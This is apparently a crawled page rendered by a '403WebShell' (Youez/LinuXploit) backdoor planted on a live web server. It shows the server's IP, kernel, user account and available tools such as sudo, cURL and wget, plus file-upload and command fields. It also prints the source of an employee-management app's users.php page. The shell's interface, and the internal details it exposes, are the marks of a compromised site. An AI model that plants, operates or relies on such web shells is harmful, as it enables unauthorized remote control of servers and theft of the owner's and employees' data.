Uname:Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 3.111.61.48  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/vhost/itms.arukustech.com/public/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhost/itms.arukustech.com/public/users.php
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

include __DIR__ . '/header.php';   // only once

require_once __DIR__ . '/../app/db.php';
require_once __DIR__ . '/../app/helpers/auth.php';

auth(); 

$pdo = db();

// Pagination
$limit = 20;
$page = isset($_GET['page']) ? (int)$_GET['page'] : 1;
$start = ($page - 1) * $limit;

// Search
$search = isset($_GET['search']) ? trim($_GET['search']) : "";

$where = "";
$params = [];

if ($search !== "") {
    $where = "WHERE name LIKE ? OR email LIKE ? OR employee_id LIKE ?";
    $params = ["%$search%", "%$search%", "%$search%"];
}

// Total count
$totalSql = "SELECT COUNT(*) FROM users $where";
$stmt = $pdo->prepare($totalSql);
$stmt->execute($params);
$total = $stmt->fetchColumn();
$pages = ceil($total / $limit);

// Fetch users
$sql = "SELECT * FROM users $where ORDER BY id DESC LIMIT $start, $limit";
$stmt = $pdo->prepare($sql);
$stmt->execute($params);
$users = $stmt->fetchAll(PDO::FETCH_ASSOC);

?>

<!-- <div class="container mt-4"> -->
    <div class="container-fluid mt-2">
    <div class="d-flex justify-content-between align-items-center mb-3">
        <h3>User Management</h3>

        <div>
            <a href="users_bulk_upload.php" class="btn btn-secondary btn-sm">Bulk Upload</a>
            <a href="users_add.php" class="btn btn-primary btn-sm">Add User</a>
        </div>
    </div>

    <!-- SUCCESS & ERROR ALERTS -->
    <?php if (isset($_GET['added'])): ?>
        <div class="alert alert-success">User added successfully.</div>
    <?php endif; ?>

    <?php if (isset($_GET['updated'])): ?>
        <div class="alert alert-success">User updated successfully.</div>
    <?php endif; ?>

    <?php if (isset($_GET['deleted'])): ?>
        <div class="alert alert-success">User deleted successfully.</div>
    <?php endif; ?>

    <?php if (isset($_GET['error'])): ?>
        <div class="alert alert-danger">
            <?php
            $err = $_GET['error'];
            if ($err == "denied") echo "You do not have permission.";
            if ($err == "invalid") echo "Invalid request.";
            if ($err == "notfound") echo "User not found.";
            if ($err == "cannot_delete_self") echo "You cannot delete your own account.";
            if ($err == "cannot_delete_superadmin") echo "You cannot delete a SuperAdmin.";
            ?>
        </div>
    <?php endif; ?>

    <!-- <form method="GET" class="mb-3">
        <input 
            type="text" 
            name="search" 
            class="form-control" 
            placeholder="Search by name, email, employee ID..." 
            value="<?//php echo htmlspecialchars($search); ?>"
        >
    </form> -->

<form method="GET" class="mb-2">
    <input 
        type="search"
        name="search"
        class="form-control"
        placeholder="Search by name, email, employee ID…  ↵"
        value="<?php echo htmlspecialchars($search); ?>"
    >
    <small class="text-muted ms-1">
        Press <b>Enter</b> to search
    </small>
</form>



<div class="table-responsive">
    <table class="table table-bordered">
        <thead>
            <tr>
                <th>#</th>
                <th>Employee ID</th>
                <th>Name</th>
                <th>Email</th>
                <th>Mobile</th>
                <th>Department</th>
                <th>Role</th>
                <th>Status</th>
                <th width="140">Actions</th>
            </tr>
        </thead>

        <tbody>
            <?php if (empty($users)): ?>
                <tr>
                    <td colspan="9" class="text-center">No users found</td>
                </tr>
            <?php else: ?>
                <?php foreach ($users as $u): ?>
                    <tr>
                        <td><?php echo $u['id']; ?></td>
                        <td><?php echo htmlspecialchars($u['employee_id']); ?></td>
                        <td><?php echo htmlspecialchars($u['name']); ?></td>
                        <td><?php echo htmlspecialchars($u['email']); ?></td>
                        <td><?php echo htmlspecialchars($u['mobile']); ?></td>
                        <td><?php echo htmlspecialchars($u['department']); ?></td>

                        <td>
                            <?php if ($u['role'] == 'employee'): ?>
                                <span class="badge bg-secondary">Employee</span>
                            <?php elseif ($u['role'] == 'admin'): ?>
                                <span class="badge bg-info">Admin</span>
                            <?php elseif ($u['role'] == 'superadmin'): ?>
                                <span class="badge bg-danger">SuperAdmin</span>
                            <?php else: ?>
                                <span class="badge bg-primary">User</span>
                            <?php endif; ?>
                        </td>

                        <td>
                            <?php if ($u['status'] == 1): ?>
                                <span class="badge bg-success">Active</span>
                            <?php else: ?>
                                <span class="badge bg-danger">Inactive</span>
                            <?php endif; ?>
                        </td>

                        <td>
                            <a href="users_edit.php?id=<?php echo $u['id']; ?>" 
                               class="btn btn-sm btn-warning">Edit</a>

                            <?php if ($_SESSION['role'] === 'superadmin' && $u['role'] !== 'superadmin'): ?>
                                <a href="users_delete.php?id=<?php echo $u['id']; ?>" 
                                   class="btn btn-sm btn-danger"
                                   onclick="return confirm('Delete this user?')">Delete</a>
                            <?php endif; ?>
                        </td>
                    </tr>
                <?php endforeach; ?>
            <?php endif; ?>
        </tbody>
    </table>
    </div>

    <!-- Pagination -->
    <nav>
        <ul class="pagination">
            <?php for ($i=1; $i <= $pages; $i++): ?>	
                <li class="page-item <?php echo ($i == $page ? 'active' : ''); ?>">
                    <a class="page-link" href="?page=<?php echo $i; ?>&search=<?php echo urlencode($search); ?>">
                        <?php echo $i; ?>
                    </a>
                </li>
            <?php endfor; ?>
        </ul>
    </nav>

</div>

<script>
// Auto-hide alerts after 3 seconds
setTimeout(() => {
    let alerts = document.querySelectorAll('.alert');
    alerts.forEach(a => a.style.display = 'none');
}, 3000);
</script>

<?php include 'footer.php'; ?>

Youez - 2016 - github.com/yon3zu
LinuXploit